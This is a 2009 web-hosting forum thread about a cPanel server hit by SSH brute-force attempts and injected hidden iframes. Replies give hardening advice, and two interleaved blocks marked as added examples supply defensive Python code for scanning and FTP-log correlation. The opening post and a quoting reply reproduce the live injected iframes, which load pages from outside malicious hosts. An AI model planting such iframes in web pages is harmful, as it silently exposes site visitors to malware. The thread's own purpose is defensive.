Full Version: Injection scripts on my server!
The Planet Forums > Security > General Security
ns1
Recently I have noticed that my server is constantly "under attack".

Brute force protection notifies me every day about a dozen attempted logins to various users, including root. Like this:
CODE
5 failed login attempts to account root (system) -- Large number of attempts from this IP: 196.6.129.218


Also, a few days ago I got injected with scripts on a few sites, some of my own, some of my clients'. The scripts are basically the same, but they differ from site to site.

A few examples:
CODE
<body onload="MM_preloadImages('images/vsr2_05.gif','images/vsr2_06.gif','images/vsr2_07.gif','images/vsr2_08.gif','images/vsr2_09.gif','images/vsr2_14.gif','images/vsr2_15.gif','images/vsr2_16.gif','images/vsr2_17.gif','images/vsr2_18.gif')"><iframe src="http://x7o.ru:8080/index.php" width=111 height=174 style="visibility: hidden"></iframe>


or:

CODE
<iframe src="http://xj4.in:8080/index.php" width=190 height=162 style="visibility: hidden"></iframe>


I want to prevent this from happening in future. How do I do that?

I have cPanel 11.24.5-S37946 - WHM 11.24.2 - X 3.9; RedHat Enterprise 5.2 i686 standard.
I installed APF, chkrootkit and rkhunter, and applied almost all the server tweaks as instructed here:
http://forums.theplanet.com/index.php?showtopic=69663
(except disabling root login and enabling SuExec)

I would appreciate your help. Thank you.
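The two injections quoted above share a shape: an off-site iframe that is hidden by CSS or sized so small it cannot be a real embed. The scanner below is an added example (not code from the thread or from cPanel) that walks a web root and flags exactly that pattern; the file extensions, the `own_hosts` allow-list and the 2-pixel size threshold are my assumptions.

```python
"""Scan a web root for injected hidden off-site iframes (added example)."""
import os
import re
from urllib.parse import urlparse

# Tag regex plus an attribute regex that accepts quoted or bare values,
# because the injected samples use unquoted width=111 / height=174.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SCAN_EXT = (".html", ".htm", ".php", ".tpl", ".js")   # assumed set of file types to inspect

def parse_attrs(raw):
    """Lower-cased attribute dict from the inside of a tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}

def find_hidden_iframes(html, own_hosts=()):
    """Return suspicious iframe records in one document.

    Suspicious = src points at a host not in own_hosts AND the frame is
    either CSS-hidden or at most 2px wide/high.  Relative srcs are skipped."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        if not host or host in own_hosts:
            continue
        hidden = bool(HIDDEN_RE.search(attrs.get("style", "")))
        try:
            tiny = int(attrs.get("width", "999")) <= 2 or int(attrs.get("height", "999")) <= 2
        except ValueError:
            tiny = False
        if hidden or tiny:
            hits.append({"src": src, "host": host, "hidden": hidden,
                         "tiny": tiny, "offset": m.start()})
    return hits

def scan_tree(root, own_hosts=()):
    """Walk a directory tree; yield (path, record) for every suspicious iframe."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for rec in find_hidden_iframes(fh.read(), own_hosts):
                        yield path, rec
            except OSError:
                continue
```

Running `scan_tree("/home", own_hosts={"yourdomain.example"})` over every account's `public_html` gives a list of hits to compare against file modification times and logs.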
James Jhurani
QUOTE (ns1 @ Aug 4 2009, 04:00 AM) *
Recently I have noticed that my server is constantly "under attack".

Brute force protection notifies me every day about a dozen attempted logins to various users, including root. Like this:
CODE
5 failed login attempts to account root (system) -- Large number of attempts from this IP: 196.6.129.218


Also, a few days ago I got injected with scripts on a few sites, some of my own, some of my clients'. The scripts are basically the same, but they differ from site to site.

A few examples:
CODE
<body onload="MM_preloadImages('images/vsr2_05.gif','images/vsr2_06.gif','images/vsr2_07.gif','images/vsr2_08.gif','images/vsr2_09.gif','images/vsr2_14.gif','images/vsr2_15.gif','images/vsr2_16.gif','images/vsr2_17.gif','images/vsr2_18.gif')"><iframe src="http://x7o.ru:8080/index.php" width=111 height=174 style="visibility: hidden"></iframe>


or:

CODE
<iframe src="http://xj4.in:8080/index.php" width=190 height=162 style="visibility: hidden"></iframe>


I want to prevent this from happening in future. How do I do that?

I have cPanel 11.24.5-S37946 - WHM 11.24.2 - X 3.9; RedHat Enterprise 5.2 i686 standard.
I installed APF, chkrootkit and rkhunter, and applied almost all the server tweaks as instructed here:
http://forums.theplanet.com/index.php?showtopic=69663
(except disabling root login and enabling SuExec)

I would appreciate your help. Thank you.


Most of the time you end up with iframe injections because of scripts on your server being exploited. All too often I come across compromised servers that had an old, forgotten SquirrelMail install, or an unkept version of Joomla, etc. Pre-made scripts are not solely responsible; often custom code can be exploited as well. So to answer your question, there really is no good way to prevent this.

Many people suggest mod_security, with a good ruleset it can be very helpful. The down side is it can be restrictive to your users.

I personally like suPHP. Essentially a user's PHP scripts are executed as the user him/herself. If a user's code is compromised, and your permissions are set up properly, you can limit the damage to the one compromised user's data. Unfortunately, many times the permissions in the rest of the user directories are not correct, e.g. random directories readable/writable to the world. Another advantage of suPHP is that the malicious files you find will be owned by the compromised user. In other words, you know which site to suspend fairly quickly.

Sorry I couldn't be of more help, but it is difficult to advise you on how to proceed without investigating it personally. Good luck, and if you have any more direct questions we can help you with, please let us know.
James Jhurani
Also, change your sshd port from the default port (22) to something non-standard. That will help you avoid those annoying sshd password crackers.

Don't forget to update your Orbit password notes with the new sshd port.
ns1
QUOTE (James Jhurani @ Aug 6 2009, 07:13 AM) *
Many people suggest mod_security, with a good ruleset it can be very helpful. The down side is it can be restrictive to your users.


I have just activated mod_security. Are there some premade rulesets for it? I am not so familiar with it...


QUOTE (James Jhurani @ Aug 6 2009, 07:13 AM) *
I personally like suPHP. Essentially a user's PHP scripts are executed as the user him/herself. If a user's code is compromised, and your permissions are set up properly, you can limit the damage to the one compromised user's data. Unfortunately, many times the permissions in the rest of the user directories are not correct, e.g. random directories readable/writable to the world. Another advantage of suPHP is that the malicious files you find will be owned by the compromised user. In other words, you know which site to suspend fairly quickly.


Is there "a tutorial" on how to activate this? I have tried this a couple of times and it never worked. I would like to have it installed since it would greatly help my users and my work...

With regard to your help, James, you are simply great! Thank you very much!
ns1
Also, where do I update the SSH port information? I was looking for it in Orbit2 but no luck...
Jeff Smith
ModSec Rules:
http://www.gotroot.com/tiki-index.php?page..._security+rules

Also I would suggest using CSF/LFD on top of changing your default SSH listen port. Login Failure Daemon (lfd) will monitor failed attempts at root and once a threshold is exceeded the IP address will be blocked for a certain amount of time. More information and the download can be found here:
http://www.configserver.com/cp/csf.html

*EDIT*
In Orbit2 you will go to the hardware device that you have changed the SSH port on. Hardware->(Server you have changed)->Passwords->Change. When you select Change there is a Detail field where you can specify a port, i.e. you would change "System" to "System port 6493".
vividere
QUOTE (Jeff S. @ Aug 6 2009, 03:41 PM) *
ModSec Rules:
http://www.gotroot.com/tiki-index.php?page..._security+rules

Also I would suggest using CSF/LFD on top of changing your default SSH listen port. Login Failure Daemon (lfd) will monitor failed attempts at root and once a threshold is exceeded the IP address will be blocked for a certain amount of time. More information and the download can be found here:
http://www.configserver.com/cp/csf.html

*EDIT*
In Orbit2 you will go to the hardware device that you have changed the SSH port on. Hardware->(Server you have changed)->Passwords->Change. When you select Change there is a Detail field where you can specify a port, i.e. you would change "System" to "System port 6493".


I have been searching TP for a HowTo for CSF and can't find one. I was able to install CSF, but although I thought I had a standard server, the security check seems to think as many things are wrong as there are right.

I would like a way to know what of the security issues can be ignored and which ones should be taken care of.

I am hoping there is a list somewhere on configuring CSF for a TP version of cPanel.

Thanks!
theuruguayan
If you check the cPanel forum, there is a thread on how to install CSF in cPanel.

Something important that no one mentioned is to check the FTP logs. Most of the time these days you get injected because some adware or malware infects your or your clients' computers and uses the FTP login to log in and inject the files.

Probably a good idea to check that too, and to check the passwords of the affected accounts.
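The FTP-log check suggested above can be made concrete by correlating the injected files with the uploads that wrote them. This is an added example, not code from the thread or from any FTP daemon; it assumes the server writes a wu-ftpd style xferlog (the format pure-ftpd and proftpd produce), and the log lines inside it are constructed for illustration.

```python
"""Correlate injected files with FTP uploads in an xferlog (added example)."""
import re
from collections import defaultdict

# xferlog fields: date (5 tokens) xfer-secs remote-host size filename type
# special-action direction (i=upload, o=download) access-mode user service auth uid status
XFER_RE = re.compile(
    r"^(?P<date>\w{3} \w{3} +\d+ [\d:]+ \d{4}) (?P<secs>\d+) (?P<host>\S+) (?P<size>\d+) "
    r"(?P<file>\S+) (?P<type>[ab]) (?P<action>\S) (?P<dir>[io]) (?P<mode>[ar]) "
    r"(?P<user>\S+) (?P<svc>\S+) (?P<auth>\S+) (?P<uid>\S+) (?P<status>[ci])$"
)

# Constructed sample log: one remote host uploads index pages into two accounts.
SAMPLE_LOG = """\
Mon Aug  3 02:11:07 2009 1 203.0.113.45 4812 /home/site1/public_html/index.html a _ i r site1 ftp 0 * c
Mon Aug  3 09:30:41 2009 2 198.51.100.7 51200 /home/site2/public_html/photo.jpg a _ i r site2 ftp 0 * c
Tue Aug  4 01:58:13 2009 1 203.0.113.45 3990 /home/site2/public_html/index.php a _ i r site2 ftp 0 * c
Tue Aug  4 10:02:55 2009 1 192.0.2.20 3990 /home/site2/public_html/index.php a _ o r site2 ftp 0 * c
"""

def parse_xferlog(text):
    """Yield a dict per well-formed xferlog line; malformed lines are skipped."""
    for line in text.splitlines():
        m = XFER_RE.match(line)
        if m:
            yield m.groupdict()

def uploads_of(text, infected_paths):
    """Map each infected path to (user, remote host, time) of the uploads that wrote it."""
    wanted = set(infected_paths)
    out = defaultdict(list)
    for rec in parse_xferlog(text):
        if rec["dir"] == "i" and rec["file"] in wanted:
            out[rec["file"]].append((rec["user"], rec["host"], rec["date"]))
    return dict(out)

def shared_upload_hosts(text):
    """Remote hosts that uploaded into more than one account: the signature of a
    single stolen-credential source hitting several sites."""
    by_host = defaultdict(set)
    for rec in parse_xferlog(text):
        if rec["dir"] == "i":
            by_host[rec["host"]].add(rec["user"])
    return {h: sorted(u) for h, u in by_host.items() if len(u) > 1}
```

Feed it the real `/var/log/xferlog` and the paths your file scan flagged; every account whose injected file was uploaded over FTP needs its password changed and the client's PC checked.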

vividere
QUOTE (theuruguayan @ Nov 3 2009, 03:19 PM) *
If you check the cPanel forum, there is a thread on how to install CSF in cPanel.

Something important that no one mentioned is to check the FTP logs. Most of the time these days you get injected because some adware or malware infects your or your clients' computers and uses the FTP login to log in and inject the files.

Probably a good idea to check that too, and to check the passwords of the affected accounts.


Hello,

I have looked on the cPanel forum twice, and even though the author is a moderator there, I have yet to be able to find help on all the security issues it raises. I want some assurance that if the security check says I need to do something, I have done the changes that are needed but am not doing some that I shouldn't be doing.

BTW, I have actually been to Uruguay, but only briefly.

Lew
theuruguayan
Lew, most of the CSF warnings are fine in almost 99% of situations. We have tested it on more than a few hundred servers without any issues.

If you have a question on any of the warnings, just let me know.

Well, next time drop me an email and we can go and have a beer somewhere.
vividere
QUOTE (theuruguayan @ Nov 3 2009, 10:40 PM) *
Lew, most of the CSF warnings are fine in almost 99% of situations. We have tested it on more than a few hundred servers without any issues.

If you have a question on any of the warnings, just let me know.

Well, next time drop me an email and we can go and have a beer somewhere.


When I run the security check, there are as many warnings as ones saying things are OK. Not knowing better, I don't know which warnings are unimportant vs. ones I should make a change on the server for.

I was amazed at how many old cars (20s and 30s) there were there, all over the streets; it was like going to a museum.

Lew
Invision Power Board © 2001-2010 Invision Power Services, Inc.